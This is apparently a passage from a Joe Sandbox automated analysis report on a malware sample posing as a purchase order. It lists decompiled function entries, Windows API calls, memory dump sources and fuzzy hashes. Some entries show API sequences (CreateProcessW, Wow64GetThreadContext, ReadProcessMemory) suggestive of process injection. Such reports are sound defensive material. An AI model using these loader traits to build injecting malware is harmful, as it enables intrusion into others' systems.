                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A92ECB
                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A92EEC
                      • ShowWindow.USER32(00000000), ref: 00A92F00
                      • ShowWindow.USER32(00000000), ref: 00A92F09
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$CreateShow
                      • String ID: AutoIt v3$edit
                      • API String ID: 1584632944-3779509399
                      • Opcode ID: b5ecc6f07425ed8e0e42a94e4f85ec5d04eccea39220e9190d8e426dc8b72b09
                      • Instruction ID: 5ecc28c692c381f4bd654aa5ee1012fc29b68803d825031f8825a540bed6b18e
                      • Opcode Fuzzy Hash: b5ecc6f07425ed8e0e42a94e4f85ec5d04eccea39220e9190d8e426dc8b72b09
                      • Instruction Fuzzy Hash: B5F0D0715403D07AD731975B6C48F672E7ED7CBF11B05455EBA08931F0C9610895DAB0
                      Function 013BC348 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 013BC238: Sleep.KERNEL32(000001F4), ref: 013BC249
                      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 013BC449
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051465036.00000000013B9000.00000040.00000020.00020000.00000000.sdmp, Offset: 013B9000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_13b9000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CreateFileSleep
                      • String ID: ZJVCFJ9J7WBMYD3X8
                      • API String ID: 2694422964-3489199035
                      • Opcode ID: 9a705e231a2286184239d8280caa9587be4b5c049c0f5329038b9cdf176bf9af
                      • Instruction ID: 9e2db9f31fd081993a90a54c2ba4f2023581beaaf16d1cef8fb06bc271267c35
                      • Opcode Fuzzy Hash: 9a705e231a2286184239d8280caa9587be4b5c049c0f5329038b9cdf176bf9af
                      • Instruction Fuzzy Hash: 95517371E04249DAEF21DBA4C854BEFBBB8AF15304F004199E709BB2C0E6B91B05CB65
                      Function 00A938E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON
                      Download Yara Rule
                      APIs
                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B0454E
                        • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                      • _memset.LIBCMT ref: 00A93965
                      • _wcscpy.LIBCMT ref: 00A939B5
                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A939C6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                      • String ID: Line:
                      • API String ID: 3942752672-1585850449
                      • Opcode ID: 7dd655d19f8ac0824deb2e547c88804cc9fa4afbc43fb2ede98cd9c7dcb4e0e2
                      • Instruction ID: a82aaffc717de2f35d347eeb213f27116e4699a6e6c5106ca2984f934d41422e
                      • Opcode Fuzzy Hash: 7dd655d19f8ac0824deb2e547c88804cc9fa4afbc43fb2ede98cd9c7dcb4e0e2
                      • Instruction Fuzzy Hash: AC31C172608340ABDF21EB64DC51BDEB7F8AF54311F04495AF685931A1DF709A48CB92
                      Function 00A93DCB Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A93F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00A934E2,?,00000001), ref: 00A93FCD
                      • _free.LIBCMT ref: 00B03C27
                      • _free.LIBCMT ref: 00B03C6E
                        • Part of subcall function 00A9BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00B522E8,?,00000000,?,00A93E2E,?,00000000,?,00B2DBF0,00000000,?), ref: 00A9BE8B
                        • Part of subcall function 00A9BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00A93E2E,?,00000000,?,00B2DBF0,00000000,?,00000002), ref: 00A9BEA7
                        • Part of subcall function 00A9BDF0: __wsplitpath.LIBCMT ref: 00A9BF19
                        • Part of subcall function 00A9BDF0: _wcscpy.LIBCMT ref: 00A9BF31
                        • Part of subcall function 00A9BDF0: _wcscat.LIBCMT ref: 00A9BF46
                        • Part of subcall function 00A9BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 00A9BF56
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                      • API String ID: 1510338132-1757145024
                      • Opcode ID: a2bf36ed181de22d1e885128a7a6b9c92bbf47901e703f90e57ab45ea0381f57
                      • Instruction ID: cfc806eab940feaebf4d9612d7798cca6d19496747a398e12df7e08328639063
                      • Opcode Fuzzy Hash: a2bf36ed181de22d1e885128a7a6b9c92bbf47901e703f90e57ab45ea0381f57
                      • Instruction Fuzzy Hash: 1E917F71A10219AFCF04EFA4DD959EEBBF8FF19710F14446AF416AB291DB349A04CB50
                      Function 00AB413E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                      Download Yara Rule
                      APIs
                      • __getstream.LIBCMT ref: 00AB418E
                        • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 00AB41C9
                      • __wopenfile.LIBCMT ref: 00AB41D9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                      • String ID: <G
                      • API String ID: 1820251861-2138716496
                      • Opcode ID: cb06f92078b760ab2855e06efca9dd1be83bea1344fdfef81aa41ff330dd331c
                      • Instruction ID: 88a9b229bd54ac49604c7f803ea5b6bd02b002a3400feebc9bb07f4a7202b550
                      • Opcode Fuzzy Hash: cb06f92078b760ab2855e06efca9dd1be83bea1344fdfef81aa41ff330dd331c
                      • Instruction Fuzzy Hash: 03110A70D002169FDB10BFBC9D426EF37FCAF58390B148625A815DB283EB74C981A761
                      Function 00AAC955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                      Download Yara Rule
                      APIs
                      • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00AAC948,SwapMouseButtons,00000004,?), ref: 00AAC979
                      • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00AAC948,SwapMouseButtons,00000004,?,?,?,?,00AABF22), ref: 00AAC99A
                      • RegCloseKey.KERNEL32(00000000,?,?,00AAC948,SwapMouseButtons,00000004,?,?,?,?,00AABF22), ref: 00AAC9BC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CloseOpenQueryValue
                      • String ID: Control Panel\Mouse
                      • API String ID: 3677997916-824357125
                      • Opcode ID: c9c551042e4bcb3ab9e00ca4d9be9fdbd48284780cbf8f1cd532a5dc077fab90
                      • Instruction ID: c38d93e10fd6692563cf4cb55a74a9c81aa4eb21c628d8f0411b76afe17ce69f
                      • Opcode Fuzzy Hash: c9c551042e4bcb3ab9e00ca4d9be9fdbd48284780cbf8f1cd532a5dc077fab90
                      • Instruction Fuzzy Hash: 52117C75511208FFEB128F64DC44EEF7BB8EF09750F00841AB841E7250D7319E409B60
                      Function 013BB238 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                      Download Yara Rule
                      APIs
                      • CreateProcessW.KERNEL32(?,00000000), ref: 013BB9F3
                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 013BBA89
                      • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 013BBAAB
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051465036.00000000013B9000.00000040.00000020.00020000.00000000.sdmp, Offset: 013B9000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_13b9000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                      • String ID:
                      • API String ID: 2438371351-0
                      • Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                      • Instruction ID: f7c340523b6a257608215fbf081e3ff4365b47a84bc6ade4274b9553fc49a39a
                      • Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                      • Instruction Fuzzy Hash: 77622030A14618DBEB24CFA4C850BDEB775EF58304F1091A9D20DEB794EB799E80CB59
                      Function 00ADCC82 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A941A7: _fseek.LIBCMT ref: 00A941BF
                        • Part of subcall function 00ADCE59: _wcscmp.LIBCMT ref: 00ADCF49
                        • Part of subcall function 00ADCE59: _wcscmp.LIBCMT ref: 00ADCF5C
                      • _free.LIBCMT ref: 00ADCDC9
                      • _free.LIBCMT ref: 00ADCDD0
                      • _free.LIBCMT ref: 00ADCE3B
                        • Part of subcall function 00AB28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00AB8715,00000000,00AB88A3,00AB4673,?), ref: 00AB28DE
                        • Part of subcall function 00AB28CA: GetLastError.KERNEL32(00000000,?,00AB8715,00000000,00AB88A3,00AB4673,?), ref: 00AB28F0
                      • _free.LIBCMT ref: 00ADCE43
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                      • String ID:
                      • API String ID: 1552873950-0
                      • Opcode ID: aae9b6d307097e5c95e800f3d48533f281671ab1ca06387605bf2f2c615f8bb0
                      • Instruction ID: 74006ccdececbb7277ea31d4b5f23da708f6cb3c6deee2c81bce5df0e1969cbe
                      • Opcode Fuzzy Hash: aae9b6d307097e5c95e800f3d48533f281671ab1ca06387605bf2f2c615f8bb0
                      • Instruction Fuzzy Hash: 15513EB1A04219AFDF159F64CC81BAEB7B9EF48310F1040AEF659A3251DB715A80CF59
                      Function 00A93BFF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 00B03CF1
                      • GetOpenFileNameW.COMDLG32(?,?,00000001,00B522E8), ref: 00B03D35
                        • Part of subcall function 00A931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00A931DA
                        • Part of subcall function 00A93A67: SHGetMalloc.SHELL32(00A93C31), ref: 00A93A7D
                        • Part of subcall function 00A93A67: SHGetDesktopFolder.SHELL32(?), ref: 00A93A8F
                        • Part of subcall function 00A93A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00A93AD2
                        • Part of subcall function 00A93B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,00B522E8,?), ref: 00A93B65
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: NamePath$Full$DesktopFileFolderFromListMallocOpen_memset
                      • String ID: X
                      • API String ID: 3714316930-3081909835
                      • Opcode ID: 209dd0d9d971e74f1b9e11d440d8bc7eead192739a13eb0d8917a5537323233e
                      • Instruction ID: 693661f1d89a1a1c8781f46895d9f9dd7665cf435872023608b58773a167c498
                      • Opcode Fuzzy Hash: 209dd0d9d971e74f1b9e11d440d8bc7eead192739a13eb0d8917a5537323233e
                      • Instruction Fuzzy Hash: 6611CA72B00288ABCF05DFD8D8096DEBBFDAF45704F04800AE401BB281CBB55B498BA5
                      Function 00ADD009 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                      Download Yara Rule
                      APIs
                      • GetTempPathW.KERNEL32(00000104,?), ref: 00ADD01E
                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00ADD035
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Temp$FileNamePath
                      • String ID: aut
                      • API String ID: 3285503233-3010740371
                      • Opcode ID: 43fd38e24fa875d5b163945039abc788c68bc0d6768f22619241776558a8edaa
                      • Instruction ID: 03c7e260acc296d56807d2e309b47b7491b85a67890e8c5ceda3bc494f2eca7d
                      • Opcode Fuzzy Hash: 43fd38e24fa875d5b163945039abc788c68bc0d6768f22619241776558a8edaa
                      • Instruction Fuzzy Hash: 49D05EB554030EBBDB10ABA0ED0EF99B7ACA704704F5081907625D20D1D7B4D7458BA0
                      Function 00AEF79F Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8e4be03c550270df6d294d3e75b78d055ae7c9d8e2d4c1bb1eaf850d61672100
                      • Instruction ID: 8e3f0c71874f3350e180b189b696fb3e37ee64d7ee081cb2311a37e5bfa616d8
                      • Opcode Fuzzy Hash: 8e4be03c550270df6d294d3e75b78d055ae7c9d8e2d4c1bb1eaf850d61672100
                      • Instruction Fuzzy Hash: 74F17B71A047419FCB10DF29C980B5AB7E5FF88314F10896EF9999B292DB31E945CF82
                      Function 00A93A67 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                      Download Yara Rule
                      APIs
                      • SHGetMalloc.SHELL32(00A93C31), ref: 00A93A7D
                      • SHGetPathFromIDListW.SHELL32(?,?), ref: 00A93AD2
                      • SHGetDesktopFolder.SHELL32(?), ref: 00A93A8F
                        • Part of subcall function 00A93B1E: _wcsncpy.LIBCMT ref: 00A93B32
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: DesktopFolderFromListMallocPath_wcsncpy
                      • String ID:
                      • API String ID: 3981382179-0
                      • Opcode ID: d1b1ac36ab22ccbc9e8abc83987a7c1e8cb6bbe24c272062c2e48b8cd812cd9f
                      • Instruction ID: 8ec6f50b6d5c59241c16c326eb697d4876b1d60b80cd49966096329aa689499e
                      • Opcode Fuzzy Hash: d1b1ac36ab22ccbc9e8abc83987a7c1e8cb6bbe24c272062c2e48b8cd812cd9f
                      • Instruction Fuzzy Hash: 0F213D76B00114ABCF14DB95D884EEEB7BDEF88740B104094F609D7255DB309E46CB90
                      Function 00A93598 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 00A935BE
                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A93667
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: IconNotifyShell__memset
                      • String ID:
                      • API String ID: 928536360-0
                      • Opcode ID: 3ff5cdfa5d955af292a538201188e4eb07872fa6b97d38d88815f2ff3910adf7
                      • Instruction ID: 8201c3cd788cab4f08f6be421a83b2bb4dc0683415c66ffe36f5b4e86be5ee18
                      • Opcode Fuzzy Hash: 3ff5cdfa5d955af292a538201188e4eb07872fa6b97d38d88815f2ff3910adf7
                      • Instruction Fuzzy Hash: B4316FB16047019FDB21DF28D845797BBF4FB49309F00096EF69A83341EB71AA48CB52
                      Function 00AB45EC Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • __FF_MSGBANNER.LIBCMT ref: 00AB4603
                        • Part of subcall function 00AB8E52: __NMSG_WRITE.LIBCMT ref: 00AB8E79
                        • Part of subcall function 00AB8E52: __NMSG_WRITE.LIBCMT ref: 00AB8E83
                      • __NMSG_WRITE.LIBCMT ref: 00AB460A
                        • Part of subcall function 00AB8EB2: GetModuleFileNameW.KERNEL32(00000000,00B50312,00000104,?,00000001,00AB0127), ref: 00AB8F44
                        • Part of subcall function 00AB8EB2: ___crtMessageBoxW.LIBCMT ref: 00AB8FF2
                        • Part of subcall function 00AB1D65: ___crtCorExitProcess.LIBCMT ref: 00AB1D6B
                        • Part of subcall function 00AB1D65: ExitProcess.KERNEL32 ref: 00AB1D74
                        • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                      • RtlAllocateHeap.NTDLL(01360000,00000000,00000001,?,?,?,?,00AB0127,?,00A9125D,00000058,?,?), ref: 00AB462F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                      • String ID:
                      • API String ID: 1372826849-0
                      • Opcode ID: 0ea917289d62d12a5dabd20444b21f7651b0832ecf4f8a3b4db38a71f3ea9706
                      • Instruction ID: eac8716abf4d4309c6ab2df6e4b4260da168b9a757bc5cfd54fccd6b35f061fe
                      • Opcode Fuzzy Hash: 0ea917289d62d12a5dabd20444b21f7651b0832ecf4f8a3b4db38a71f3ea9706
                      • Instruction Fuzzy Hash: 6D01B531601302AAEA203B68AD62BEA735CAF86762F51012AF9059B1C7DFB4DC40C664
                      Function 00ADCFC8 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00ADCC71,?,?,?,?,?,00000004), ref: 00ADCFE1
                      • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00ADCC71,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00ADCFF7
                      • CloseHandle.KERNEL32(00000000,?,00ADCC71,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00ADCFFE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: File$CloseCreateHandleTime
                      • String ID:
                      • API String ID: 3397143404-0
                      • Opcode ID: a3f169e5214a23159bd8f2175c5dad660d12c66262acf672fa1ceae114f99e8a
                      • Instruction ID: 3a20c5b0a52a1f21f69331fa09fa966875c0f732de62b37a5b2d734d20774083
                      • Opcode Fuzzy Hash: a3f169e5214a23159bd8f2175c5dad660d12c66262acf672fa1ceae114f99e8a
                      • Instruction Fuzzy Hash: 7FE08632180214B7D7311B54EC09FCA7B19AB05770F508110FB157A0E0CBB169219798
                      Function 00A9131C Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A916F2: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00A914EB), ref: 00A91751
                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A9159B
                      • CoInitialize.OLE32(00000000), ref: 00A91612
                      • CloseHandle.KERNEL32(00000000), ref: 00B058F7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Handle$CloseInitializeMessageRegisterWindow
                      • String ID:
                      • API String ID: 3815369404-0
